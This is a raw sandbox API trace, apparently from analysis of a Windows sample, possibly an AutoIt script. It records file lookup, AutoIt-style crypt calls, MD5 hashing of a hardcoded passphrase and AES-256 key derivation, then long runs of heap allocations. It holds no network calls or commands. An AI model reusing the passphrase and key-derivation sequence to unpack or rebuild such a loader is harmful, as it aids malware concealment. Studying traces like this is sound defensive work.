nFileSizeHigh=0x0, nFileSizeLow=0x7fc1, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="BWdI74zS0.bmp", cAlternateFileName="BWDI74~1.BMP")) returned 0x41ac040 [0087.289] FindClose (in: hFindFile=0x41ac040 | out: hFindFile=0x41ac040) returned 1 [0087.289] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0087.289] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0087.289] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0087.334] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0087.334] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0087.334] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0087.334] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796d88, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0087.335] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0087.335] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796fc8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0087.335] CryptAcquireContextA (in: phProv=0x144ea08, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144ea08*=0x41a5250) returned 1 [0087.336] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0087.336] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0087.336] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0087.336] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0087.336] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0087.336] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0087.336] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0087.336] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0087.336] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0087.336] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0087.336] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43ca688, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0087.336] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e778 | out: phHash=0x144e778) returned 1 [0087.337] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0087.337] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2788, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0087.337] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0087.337] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0087.337] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2c08, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0087.337] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0087.337] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0087.337] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0087.337] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43ca4f0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0087.337] CryptHashData (hHash=0x41ac600, pbData=0x17e2848, dwDataLen=0x22, dwFlags=0x1) returned 1 [0087.337] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0087.337] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0087.337] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0087.337] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0087.337] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43ca760, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0087.337] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac600, dwFlags=0x1, phKey=0x144e778 | out: phKey=0x144e778*=0x41ac540) returned 1 [0087.338] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0087.338] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea2e0 [0087.338] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f08 [0087.338] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0087.338] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0087.338] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0087.338] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0087.338] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0087.338] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0087.338] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0087.338] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0087.338] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0087.338] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0087.338] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0087.338] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0087.338] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0087.338] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0087.338] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0087.338] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0087.338] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0087.338] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0087.338] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0087.338] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0087.338] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0087.338] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0087.339] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0087.339] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0087.339] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0087.339] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0087.339] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9a40 [0087.339] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0087.339] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0087.339] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0087.339] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0087.339] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0087.339] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0087.339] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0087.339] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0087.339] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0087.339] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0087.339] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0087.339] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0087.339] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0087.339] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0087.339] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa30 [0087.340] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca9a0 [0087.340] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca7c0 [0087.340] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0087.340] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca8e0 [0087.340] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca820 [0087.340] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca8f8 [0087.340] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca868 [0087.340] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0087.340] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca7f0 [0087.340] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0087.340] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa18 [0087.340] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0087.340] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa48 [0087.340] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca880 [0087.340] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0087.340] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca910 [0087.340] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca9b8 [0087.340] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0087.340] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca7a8 [0087.340] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca8b0 [0087.340] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0087.340] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0087.340] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0087.341] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0087.341] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391bd0 [0087.341] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0087.341] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca940 [0087.341] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d98 [0087.341] PeekMessageW (in: lpMsg=0x144e8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8b4) returned 0 [0087.341] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0087.341] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0087.341] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0087.341] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0087.341] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0087.341] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0087.341] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0087.341] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0087.341] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0087.341] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0087.341] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0087.341] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0087.341] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0087.341] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0087.342] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0087.342] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0087.342] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0087.342] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0087.342] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0087.342] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0087.342] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0087.342] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0087.342] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0087.342] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0087.342] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0087.342] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0087.342] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0087.342] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0087.342] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0087.342] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x11) returned 0x1796d88 [0087.342] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796d88, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0087.342] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0087.342] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0087.342] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0087.342] CryptDestroyHash (hHash=0x41ac600) returned 1 [0087.342] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0087.342] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e95f0 [0087.342] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0087.342] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0087.343] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0087.343] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0087.343] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0087.343] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0087.343] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0087.343] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0087.343] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0087.343] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0087.343] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0087.343] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0087.343] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0087.343] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0087.343] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0087.343] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0087.343] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0087.343] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0087.343] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0087.343] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0087.343] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0087.343] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0087.343] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0087.343] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0087.343] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0087.343] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0087.343] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0087.343] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0087.343] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0087.343] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0087.343] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0087.343] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e95f0 | out: hHeap=0x1780000) returned 1 [0087.343] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0087.344] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0087.344] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0087.344] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0087.344] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0087.344] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0087.344] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0087.344] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0087.344] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0087.344] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0087.344] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0087.344] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0087.344] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0087.344] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0087.344] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0087.344] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0087.344] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0087.344] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0087.344] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0087.344] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0087.344] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0087.344] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0087.344] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0087.344] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0087.344] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0087.344] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0087.344] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0087.344] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0087.344] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0087.344] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0087.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0087.345] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0087.345] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0087.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0087.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0087.345] 